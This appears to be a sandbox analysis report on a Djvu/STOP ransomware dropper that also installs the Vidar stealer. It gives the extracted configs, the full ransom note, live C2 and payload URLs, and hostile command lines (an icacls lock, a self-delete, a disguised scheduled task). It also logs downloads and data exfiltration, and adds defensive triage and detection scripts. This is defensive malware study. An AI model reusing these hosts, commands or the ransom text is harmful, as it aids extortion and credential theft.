Analysis

  • max time kernel
    293s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230621-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/06/2023, 05:04 UTC

General

  • Target

    fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe

  • Size

    783KB

  • MD5

    2b1d02748bbf2a293604986d1e694a44

  • SHA1

    be2d8db989a9c0797991e27ef80044ba36b50f1d

  • SHA256

    fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8

  • SHA512

    e61bd9a6de336c5d3bd47aa9efba7dcafa55e827bb3627f2ca5e7714bb8458560f01b0806fc8450bab1a9ecafd253156c395bd3680ed924469d78a35961c4257

  • SSDEEP

    12288:AnedjM5K9AlaDf00EdmwoTaDTHsTlVn1U0PU1oRCRK5SmGXPU3WCRCt:AnofDzEYwo+DTWnW0cyIkVkPKy

Malware Config

Extracted

Family

djvu

C2

http://zexeq.com/test1/get.php

Attributes
  • extension

    .aghz

  • offline_id

    IGjpno8dwAKJpBjbvlsxfyQXyNoBoo3dXUtMk6t1

  • payload_url

    http://colisumy.com/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-3OsGArf4HD Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0735JOsie

rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs2GxC12OwTlWciIhQP94
a3Po2kFcgzbR2KoMtsvkhvYmsdpsYNs31Dfd4wb9/W/USilyGz830xVCzjBSXpzV
F1Yb78BvxGT1vCypc3U4Uz3L8Er0xUOcQ5FpXtSoXxMCYOG1uYm7eE7c0O7QLbko
CMW4f5gPjE6yw4VkjOx9rkyfzS83GAFghVfpaRMOvNvQeOJ1a1C1eleO8y15GeqH
tRhOu7BVyCZ9njwJDw0f2Fxs/Jao7A4a2UmWoOhDB/ANGoQFmKbgpOYJIClz/cEA
DXd7jhp8Y5knc0RGKF9oDh40RYqtthO3AmuNCe3SMGuhgdXvmeuzjeD5UbxiYYun
vQIDAQAB
-----END PUBLIC KEY-----
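Three things a responder wants to confirm from the Djvu config above before deciding on recovery: that the embedded key really is an RSA-2048 public key (so the file keys cannot be recovered from the binary), whether the victim's ID points at an offline key (STOP/Djvu IDs generated without a C2 round-trip end in "t1", the convention the public decryptors key on; the offline_id here is the fallback this build uses when zexeq.com is unreachable, and the check should be run on the Personal ID from the note on the victim machine), and which hosts to block. The script below is an added example written for this page, not sandbox or malware code; it copies the report's own config values and walks the PEM's DER by hand so no crypto library is needed. The 4-letter extension check and the field names are assumptions for the demo.

```python
import base64
import hashlib
import re
from urllib.parse import urlparse

# Values copied from the report's "Malware Config" block above (nothing invented).
DJVU_CONFIG = {
    "extension": ".aghz",
    "offline_id": "IGjpno8dwAKJpBjbvlsxfyQXyNoBoo3dXUtMk6t1",
    "c2": "http://zexeq.com/test1/get.php",
    "payload_url": [
        "http://colisumy.com/dl/build2.exe",
        "http://zexeq.com/files/1/build3.exe",
    ],
    "rsa_pubkey": """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs2GxC12OwTlWciIhQP94
a3Po2kFcgzbR2KoMtsvkhvYmsdpsYNs31Dfd4wb9/W/USilyGz830xVCzjBSXpzV
F1Yb78BvxGT1vCypc3U4Uz3L8Er0xUOcQ5FpXtSoXxMCYOG1uYm7eE7c0O7QLbko
CMW4f5gPjE6yw4VkjOx9rkyfzS83GAFghVfpaRMOvNvQeOJ1a1C1eleO8y15GeqH
tRhOu7BVyCZ9njwJDw0f2Fxs/Jao7A4a2UmWoOhDB/ANGoQFmKbgpOYJIClz/cEA
DXd7jhp8Y5knc0RGKF9oDh40RYqtthO3AmuNCe3SMGuhgdXvmeuzjeD5UbxiYYun
vQIDAQAB
-----END PUBLIC KEY-----""",
}

RSA_OID = bytes.fromhex("2a864886f70d010101")  # rsaEncryption 1.2.840.113549.1.1.1


def _tlv(buf, pos):
    """Read one DER tag/length at pos; return (tag, content_start, content_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def parse_rsa_spki(pem):
    """Walk a PEM SubjectPublicKeyInfo by hand; return (modulus_bits, exponent, sha256 of DER)."""
    body = "".join(ln for ln in pem.splitlines() if not ln.startswith("-----"))
    der = base64.b64decode(body, validate=True)
    tag, p, _ = _tlv(der, 0)                 # SubjectPublicKeyInfo SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    tag, a, a_end = _tlv(der, p)             # AlgorithmIdentifier SEQUENCE
    _, o, o_end = _tlv(der, a)               # OID inside it
    if tag != 0x30 or der[o:o_end] != RSA_OID:
        raise ValueError("not an rsaEncryption key")
    tag, b, _ = _tlv(der, a_end)             # BIT STRING holding RSAPublicKey
    if tag != 0x03 or der[b] != 0:           # first byte = number of unused bits
        raise ValueError("unexpected BIT STRING")
    _, r, _ = _tlv(der, b + 1)               # RSAPublicKey SEQUENCE
    tag, n, n_end = _tlv(der, r)             # INTEGER modulus
    _, e, e_end = _tlv(der, n_end)           # INTEGER publicExponent
    if tag != 0x02:
        raise ValueError("modulus is not an INTEGER")
    modulus = int.from_bytes(der[n:n_end], "big")
    exponent = int.from_bytes(der[e:e_end], "big")
    return modulus.bit_length(), exponent, hashlib.sha256(der).hexdigest()


def is_offline_id(victim_id):
    """STOP/Djvu IDs generated without a key from the C2 end in 't1' (the offline-key case)."""
    return victim_id.endswith("t1")


def blocklist(cfg):
    """Hostnames to block and hunt for, taken from the C2 and payload URLs."""
    return sorted({urlparse(u).hostname for u in [cfg["c2"], *cfg["payload_url"]]})


def triage(cfg):
    bits, exp, fingerprint = parse_rsa_spki(cfg["rsa_pubkey"])
    return {
        "key": f"RSA-{bits} e={exp}",
        "key_sha256": fingerprint,
        "offline_key": is_offline_id(cfg["offline_id"]),
        # Djvu extensions are four lowercase letters; a mismatch means a mis-extracted config.
        "extension_ok": re.fullmatch(r"\.[a-z]{4}", cfg["extension"]) is not None,
        "block": blocklist(cfg),
    }


if __name__ == "__main__":
    for field, value in triage(DJVU_CONFIG).items():
        print(f"{field:13} {value}")
```

For this config the key parses as RSA-2048 with e=65537 and the embedded offline_id ends in "t1"; if the victim's own Personal ID also ends in "t1", the files were encrypted under this fixed key rather than a per-victim one fetched from get.php, which is the only case the public decryptors can help with.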

Extracted

Family

vidar

Version

4.5

Botnet

75b38583a079a9212c1fa894fd1b945f

C2

https://steamcommunity.com/profiles/76561199520592470

https://t.me/motafan

Attributes
  • profile_id_v2

    75b38583a079a9212c1fa894fd1b945f

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0

Signatures

  • Detected Djvu ransomware 14 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
    "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe"
      2⤵
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\c23005e9-e7be-4060-a099-138c38cb43aa" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:432
      • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
        "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
          "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
            "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
              "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1324
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe" & exit
                7⤵
                  PID:1108
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1936
            • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe
              "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\schtasks.exe
                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                6⤵
                • Creates scheduled task(s)
                PID:1656
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {8AEC7B78-3153-4EF0-91F5-C8E435CC2A69} S-1-5-21-1437583205-2177757337-340526699-1000:XVLNHWCX\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\SysWOW64\schtasks.exe
          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
          3⤵
          • Creates scheduled task(s)
          PID:748
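The process tree above carries four behaviours worth a host rule: the icacls call that denies Everyone (S-1-1-0) delete and delete-child rights on the AppData copy so the user cannot remove it, the sample relaunching itself with "--Admin IsNotAutoStart IsNotTask", build2.exe deleting its own binary through "cmd /c timeout & del", and the schtasks entry that re-runs mstsca.exe every minute (and re-registers itself from the task, PID 748). The script below is an added example for this page, not sandbox code; it runs those rules over process-creation events constructed from the tree (PIDs, parents and command lines as shown), walks the parent chain from the scheduled task back to the initial sample, and emits the icacls /remove:d command that undoes the deny ACE. The event fields are an assumption for the demo, not any particular EDR schema.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe"
STAGE = r"C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152"
PERSIST = r"C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
TASK = f'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "{PERSIST}"'

# Constructed events; PIDs, parents and command lines are copied from the tree above.
EVENTS = [
    ProcEvent(936, 1, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(848, 936, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(432, 848, r"C:\Windows\SysWOW64\icacls.exe",
              r'icacls "C:\Users\Admin\AppData\Local\c23005e9-e7be-4060-a099-138c38cb43aa" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
    ProcEvent(1728, 848, SAMPLE, f'"{SAMPLE}" --Admin IsNotAutoStart IsNotTask'),
    ProcEvent(1376, 1728, SAMPLE, f'"{SAMPLE}" --Admin IsNotAutoStart IsNotTask'),
    ProcEvent(2004, 1376, STAGE + r"\build2.exe", f'"{STAGE}\\build2.exe"'),
    ProcEvent(1324, 2004, STAGE + r"\build2.exe", f'"{STAGE}\\build2.exe"'),
    ProcEvent(1108, 1324, r"C:\Windows\SysWOW64\cmd.exe",
              f'"C:\\Windows\\System32\\cmd.exe" /c timeout /t 6 & del /f /q "{STAGE}\\build2.exe" & exit'),
    ProcEvent(1936, 1108, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 6"),
    ProcEvent(1652, 1376, STAGE + r"\build3.exe", f'"{STAGE}\\build3.exe"'),
    ProcEvent(1656, 1652, r"C:\Windows\SysWOW64\schtasks.exe", TASK),
    ProcEvent(1800, 1, r"C:\Windows\system32\taskeng.exe", "taskeng.exe {8AEC7B78-3153-4EF0-91F5-C8E435CC2A69}"),
    ProcEvent(1064, 1800, PERSIST, PERSIST),
    ProcEvent(748, 1064, r"C:\Windows\SysWOW64\schtasks.exe", TASK),
]


def rule_icacls_deny_delete(e):
    """Djvu locks its persisted copy: deny Everyone (S-1-1-0) delete + delete-child, inherited."""
    return (e.image.lower().endswith("icacls.exe")
            and re.search(r"/deny\s+\*S-1-1-0:\(OI\)\(CI\)\(DE,DC\)", e.cmdline) is not None)


def rule_djvu_relaunch(e):
    """Second-stage relaunch switches the sample passes to itself."""
    return "--Admin IsNotAutoStart IsNotTask" in e.cmdline


def rule_self_delete(e):
    """cmd /c timeout ... & del /f /q <self>: the stealer removing its own binary after a delay."""
    return (e.image.lower().endswith("cmd.exe")
            and re.search(r"timeout\s+/t\s+\d+.*&\s*del\s+/f\s+/q", e.cmdline, re.I) is not None)


def rule_schtasks_minute(e):
    """A task firing every minute whose action lives inside a user profile."""
    return (e.image.lower().endswith("schtasks.exe")
            and re.search(r"/sc\s+minute\s+/mo\s+1\b", e.cmdline, re.I) is not None
            and re.search(r'/tr\s+"?[a-z]:\\users\\', e.cmdline, re.I) is not None)


RULES = {
    "djvu_icacls_deny_delete": rule_icacls_deny_delete,
    "djvu_relaunch_args": rule_djvu_relaunch,
    "self_delete_timeout_del": rule_self_delete,
    "schtasks_minute_userprofile": rule_schtasks_minute,
}


def run_rules(events):
    """Return [(rule_name, pid), ...] for every event that trips a rule."""
    return [(name, e.pid) for e in events for name, pred in RULES.items() if pred(e)]


def ancestry(events, pid):
    """Follow ppid links to the root: the chain from a hit back to the initial sample."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain


def icacls_unlock_cmd(path):
    """Remediation: icacls /remove:d strips every deny ACE for the SID, reversing the lock above."""
    return f'icacls "{path}" /remove:d *S-1-1-0'


if __name__ == "__main__":
    for name, pid in run_rules(EVENTS):
        print(f"{name:28} pid={pid} chain={ancestry(EVENTS, pid)}")
    print(icacls_unlock_cmd(r"C:\Users\Admin\AppData\Local\c23005e9-e7be-4060-a099-138c38cb43aa"))
```

The ancestry walk is what ties the innocuous-looking "Azure-Update-Task" to the ransomware: schtasks (1656) descends from build3.exe, which was started by the relaunched sample, which was started by the original dropper. Run the unlock command before trying to delete the AppData copy, otherwise the delete fails even as an administrator.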

    Network

    • (US)
      DNS
      api.2ip.ua
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      api.2ip.ua
      IN A
      Response
      api.2ip.ua
      IN A
      162.0.217.254
    • (NL)
      GET
      https://api.2ip.ua/geo.json
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      162.0.217.254:443
      Request
      GET /geo.json HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: api.2ip.ua
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Fri, 30 Jun 2023 05:04:28 GMT
      Server: Apache
      Strict-Transport-Security: max-age=63072000; preload
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block; report=...
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
      Upgrade: h2,h2c
      Connection: Upgrade
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • (NL)
      GET
      https://api.2ip.ua/geo.json
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      162.0.217.254:443
      Request
      GET /geo.json HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: api.2ip.ua
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Fri, 30 Jun 2023 05:04:42 GMT
      Server: Apache
      Strict-Transport-Security: max-age=63072000; preload
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block; report=...
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
      Upgrade: h2,h2c
      Connection: Upgrade
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • (US)
      DNS
      colisumy.com
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      colisumy.com
      IN A
      Response
      colisumy.com
      IN A
      201.252.19.77
      colisumy.com
      IN A
      2.180.10.7
      colisumy.com
      IN A
      211.171.233.129
      colisumy.com
      IN A
      211.119.84.111
      colisumy.com
      IN A
      123.231.118.19
      colisumy.com
      IN A
      190.224.203.37
      colisumy.com
      IN A
      189.232.28.79
      colisumy.com
      IN A
      187.147.229.14
      colisumy.com
      IN A
      92.83.236.139
      colisumy.com
      IN A
      185.12.79.25
    • (AR)
      GET
      http://colisumy.com/dl/build2.exe
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      201.252.19.77:80
      Request
      GET /dl/build2.exe HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: colisumy.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:44 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
      Last-Modified: Wed, 28 Jun 2023 08:01:02 GMT
      ETag: "52a00-5ff2bfc24e387"
      Accept-Ranges: bytes
      Content-Length: 338432
      Connection: close
      Content-Type: application/octet-stream
    • (US)
      DNS
      zexeq.com
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      zexeq.com
      IN A
      Response
      zexeq.com
      IN A
      61.253.71.111
      zexeq.com
      IN A
      181.4.66.66
      zexeq.com
      IN A
      124.43.19.179
      zexeq.com
      IN A
      177.254.85.20
      zexeq.com
      IN A
      189.186.91.50
      zexeq.com
      IN A
      181.230.206.248
      zexeq.com
      IN A
      200.119.114.13
      zexeq.com
      IN A
      187.147.229.14
      zexeq.com
      IN A
      180.94.152.232
      zexeq.com
      IN A
      175.119.10.231
    • (KR)
      GET
      http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      61.253.71.111:80
      Request
      GET /test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: zexeq.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:44 GMT
      Server: Apache/2.4.37 (Win64) PHP/5.6.40
      X-Powered-By: PHP/5.6.40
      Content-Length: 558
      Connection: close
      Content-Type: text/html; charset=UTF-8
    • (KR)
      GET
      http://zexeq.com/files/1/build3.exe
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      61.253.71.111:80
      Request
      GET /files/1/build3.exe HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: zexeq.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:48 GMT
      Server: Apache/2.4.37 (Win64) PHP/5.6.40
      Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
      ETag: "2600-5c86757379380"
      Accept-Ranges: bytes
      Content-Length: 9728
      Connection: close
      Content-Type: application/x-msdownload
    • (US)
      DNS
      t.me
      build2.exe
      Remote address:
      8.8.8.8:53
      Request
      t.me
      IN A
      Response
      t.me
      IN A
      149.154.167.99
    • (US)
      DNS
      steamcommunity.com
      build2.exe
      Remote address:
      8.8.8.8:53
      Request
      steamcommunity.com
      IN A
      Response
      steamcommunity.com
      IN A
      23.197.146.96
    • (US)
      GET
      https://steamcommunity.com/profiles/76561199520592470
      build2.exe
      Remote address:
      23.197.146.96:443
      Request
      GET /profiles/76561199520592470 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
      Host: steamcommunity.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: text/html; charset=UTF-8
      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ *.google-analytics.com https://www.google.com https://www.gstatic.com https://apis.google.com https://recaptcha.net https://www.gstatic.cn/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ *.google-analytics.com https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
      Expires: Mon, 26 Jul 1997 05:00:00 GMT
      Cache-Control: no-cache
      Date: Fri, 30 Jun 2023 05:04:59 GMT
      Content-Length: 34803
      Connection: keep-alive
      Set-Cookie: sessionid=6a975690e2d909a4248400ab; Path=/; Secure; SameSite=None
      Set-Cookie: steamCountry=US%7C5b568ee6ecd2b2e41b0e9f3b77002b41; Path=/; Secure; HttpOnly; SameSite=None
    • (DE)
      GET
      http://195.201.253.168/75b38583a079a9212c1fa894fd1b945f
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      GET /75b38583a079a9212c1fa894fd1b945f HTTP/1.1
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • (DE)
      GET
      http://195.201.253.168/archive.zip
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      GET /archive.zip HTTP/1.1
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:00 GMT
      Content-Type: application/zip
      Content-Length: 2685679
      Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
      Connection: keep-alive
      ETag: "631f30d3-28faef"
      Accept-Ranges: bytes
    • (DE)
      POST
      http://195.201.253.168/
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      POST / HTTP/1.1
      Content-Type: multipart/form-data; boundary=----8469070475750417
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Content-Length: 82929
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:06 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • 162.0.217.254:443
      https://api.2ip.ua/geo.json
      tls, http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      1.1kB
      9.7kB
      13
      14

      HTTP Request

      GET https://api.2ip.ua/geo.json

      HTTP Response

      429
    • 162.0.217.254:443
      https://api.2ip.ua/geo.json
      tls, http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      1.0kB
      9.6kB
      12
      13

      HTTP Request

      GET https://api.2ip.ua/geo.json

      HTTP Response

      429
    • 201.252.19.77:80
      http://colisumy.com/dl/build2.exe
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      6.3kB
      349.1kB
      136
      259

      HTTP Request

      GET http://colisumy.com/dl/build2.exe

      HTTP Response

      200
    • 61.253.71.111:80
      http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      367 B
      974 B
      5
      5

      HTTP Request

      GET http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true

      HTTP Response

      200
    • 61.253.71.111:80
      http://zexeq.com/files/1/build3.exe
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      462 B
      10.5kB
      8
      11

      HTTP Request

      GET http://zexeq.com/files/1/build3.exe

      HTTP Response

      200
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      385 B
      219 B
      5
      5
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      347 B
      219 B
      5
      5
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      288 B
      219 B
      5
      5
    • 149.154.167.99:443
      t.me
      build2.exe
      190 B
      92 B
      4
      2
    • 23.197.146.96:443
      https://steamcommunity.com/profiles/76561199520592470
      tls, http
      build2.exe
      1.5kB
      43.5kB
      23
      37

      HTTP Request

      GET https://steamcommunity.com/profiles/76561199520592470

      HTTP Response

      200
    • 195.201.253.168:80
      http://195.201.253.168/
      http
      build2.exe
      162.0kB
      2.8MB
      1342
      2029

      HTTP Request

